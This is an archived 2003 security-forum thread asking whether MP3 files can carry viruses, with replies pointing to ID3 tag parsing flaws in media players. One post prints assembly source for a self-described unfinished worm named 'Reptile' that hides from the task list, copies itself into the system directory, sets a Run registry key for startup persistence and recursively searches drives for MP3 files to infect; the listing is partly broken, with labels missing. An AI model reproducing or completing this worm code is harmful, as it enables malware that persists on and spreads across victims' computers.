Your browser does not seem to support CSS. If images appear below, please disregard them.
It appears that you're running an Ad-Blocker. This site is monetized by Advertising and by User Donations; we ask that if you find this site helpful that you whitelist us in your Ad-Blocker, or make a Donation to help aid in operating costs.
Previous Thread
Next Thread
Print Thread
Rate This Thread
#2714 - 09/17/03 12:15 AM Virus on mp3 files?  
Joined: Feb 2003
Posts: 10
GhostintheNight Offline
Junior Member
GhostintheNight  Offline
Junior Member

Joined: Feb 2003
Posts: 10
Even tho i think he's completly wrong, a buddy of mine told me that he downloaded a song or something to that effect from Kazaa and ended up getting a virus from it. He says it wasn't a program that the virus came from, but from a song... just wondering if anyone had herd about viruses being embedded in media files...

Sponsored Links
#2715 - 09/17/03 12:56 AM Re: Virus on mp3 files?  
Joined: Oct 2002
Posts: 955
jonconley Offline
UGN Super Poster
jonconley  Offline
UGN Super Poster

Joined: Oct 2002
Posts: 955
Merrill, IA, USA
Actually, the mp3/wma itsef doesn't have a virus. I believe it is in the handling of the ID3 tags (they hold the specific info about the song, artist, etc)

Windows Hole
WinAmp Hole

I am sure there are more, but this atleast shows you that it is possible.

#2716 - 09/19/03 10:43 AM Re: Virus on mp3 files?  
Joined: Aug 2003
Posts: 240
paradox Offline
paradox  Offline

Joined: Aug 2003
Posts: 240
New Zealand
There is an exploit for midi files changing the tags and setting the buffer to 0xfffffffff as for mp3
.Model Flat ,StdCall
option casemap:none

include ..\..\include\
include ..\..\include\
include ..\..\include\
include ..\..\include\
includelib ..\..\lib\kernel32.lib
includelib ..\..\lib\user32.lib
includelib ..\..\lib\advapi32.lib
residentname db "\SYSLOAD.EXE",0
regserviceproc db "RegisterServiceProcess",0
kernel32str db "kernel32.dll",0
subkey db "Software\Microsoft\Windows\CurrentVersion\Run",0
keyname db "Reptile",0
searchpattern db "???*",0
rootdir db "\",0
previousdir db "..",0
searchindex dd ?
wormlocation dd ?
keyhandle dd ?
finddata WIN32_FIND_DATA <>
systemdir db MAX_PATH dup(?)
searchhandles db 3FCh dup(?) ;255 dwords

mov eax,worm_end - worm_start
;=======Hide myself from "Close Program" Dialog=======
invoke LoadLibraryA,addr kernel32str
invoke GetProcAddress,eax,addr regserviceproc
push 1
push NULL
call eax
;==============Find the Name/path of the worm=========
invoke GetCommandLine
inc eax
xor edx,edx
xchg eax,esi
mov edi,esi
cmp al,'"'
je FoundEnd
cmp al, 00h
jne GetNextChar
push 7
pop edx
dec esi
xchg esi,edi
xor eax,eax
test edx,edx
je NoQuotes
dec esi
mov wormlocation,esi
;==============Copy it to the system directory========
invoke GetSystemDirectory, addr systemdir, SIZEOF systemdir
invoke lstrcat, addr systemdir, addr residentname
invoke CopyFile, wormlocation, addr systemdir, FALSE
;==============Make it run when Windows starts========
invoke RegCreateKeyEx, HKEY_LOCAL_MACHINE, addr subkey, NULL, \
addr keyhandle, NULL

invoke lstrlen, addr systemdir
invoke RegSetValueEx, keyhandle, addr keyname, NULL, REG_SZ, \
addr systemdir, eax

invoke SetCurrentDirectory,addr rootdir
Call FindVictims
;==============Clean Up===============================
invoke RegCloseKey, keyhandle
invoke MessageBoxA,NULL, addr keyname,NULL,MB_OK
invoke ExitProcess,NULL
;==============Find MP3 files to infect===============
FindVictims proc
invoke FindFirstFile, addr searchpattern, addr finddata
inc eax
je BackOneDir
dec eax
inc searchindex
mov ecx, searchindex
lea edi, [searchhandles+4*ecx]
xchg ebx,eax
jmp CallParseRoutine
invoke FindNextFile, ebx, addr finddata
test eax,eax
je FinishSearch
Call ParseResult
jmp FindNext
invoke FindClose, ebx
dec searchindex
mov ecx, searchindex
test ecx,ecx
je SearchFinished
lea esi, [searchhandles+4*ecx]
xchg eax,ebx
invoke SetCurrentDirectory, addr previousdir
FindVictims endp
;==============Process result of FindFile*============
ParseResult proc
lea edi, finddata.cFileName
invoke CharLower, edi
invoke lstrlen, edi
lea esi, [finddata.cFileName-4+eax]
sub eax, '3pm.' ;Infect MP3 Files
jne NotMp3
invoke MessageBoxA,NULL,edi,NULL,MB_OK ;'Twas an MP3
and finddata.dwFileAttributes,FILE_ATTRIBUTE_DIRECTORY
je NotDirectory
mov word ptr [finddata.cFileName-2], "\."
invoke SetCurrentDirectory,addr finddata.cFileName-2
Call FindVictims
ParseResult endp

End Main

Still in construction but there are lots of holes and it would like jonconley said be software dependant etc..

The wise make mistakes, the fools repeat them
When you have eliminated the impossible, that which remains, however improbable, must be the truth
#2717 - 09/25/03 10:49 PM Re: Virus on mp3 files?  
Joined: Oct 2002
Posts: 364
Chem Offline
UGN News Staff
Chem  Offline
UGN News Staff

Joined: Oct 2002
Posts: 364
Vagabond (Location Differs)
Like jon said,

theres an exploit in the way most mp3 players (or just certain ones) handle mp3 metadata, and in turn can execute malicious code

C++ Should Have Been Called "D"

Member Spotlight
SC, usa
Posts: 506
Joined: March 2002
Show All Member Profiles 
Forum Statistics
Average Daily Posts12
Most Online1,567
Apr 25th, 2010
Latest Postings
Top Posters(All Time)
UGN Security 40,225
Gremelin 7,195
§intå× 3,255
SilentRage 1,273
Ice 1,146
pergesu 1,136
Infinite 1,041
jonconley 955
Girlie 908
unreal 860
Top Liked Users (All Time)
§intå× Likes: 1
Cold Sunn Likes: 1
Crime Likes: 1
Cyrez Likes: 1
Ghost Likes: 1
Gremelin Likes: 4
Ice Likes: 1
unreal Likes: 1
Top Liked Users (30 Days)
No Data Found
Powered by UBB.threads™ PHP Forum Software 7.6.0
(Snapshot build 20160902)